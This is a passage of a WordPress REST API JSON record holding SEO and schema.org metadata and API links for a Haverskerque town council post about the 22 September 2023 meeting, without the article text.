!*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2023-09-23T08:57:03+00:00","article_modified_time":"2024-07-29T04:38:04+00:00","og_image":[{"width":800,"height":445,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg","type":"image\/jpeg"}],"author":"Communication","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Communication","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/"},"author":{"name":"Communication","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/aafb858b21dd4f2d37a7ab8c59b836ad"},"headline":"Conseil municipal du 22 septembre 2023","datePublished":"2023-09-23T08:57:03+00:00","dateModified":"2024-07-29T04:38:04+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/"},"wordCount":314,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/","name":"Conseil municipal du 22 septembre 2023 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/conseil_municipal-800x445-1.jpg","datePublished":"2023-09-23T08:57:03+00:00","dateModified":"2024-07-29T04:38:04+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/09\/23\/conseil-municipal-du-22-septembre-2023\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil municipal du 22 septembre 2023"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/aafb858b21dd4f2d37a7ab8c59b836ad","name":"Communication","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","caption":"Communication"},"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/clement\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/4836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=4836"}],"version-history":[{"count":6,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/4836\/revisions"}],"predecessor-version":[{"id":8273,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/4836\/revisions\/8273"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/1476"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=4836"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=4836"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=4836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}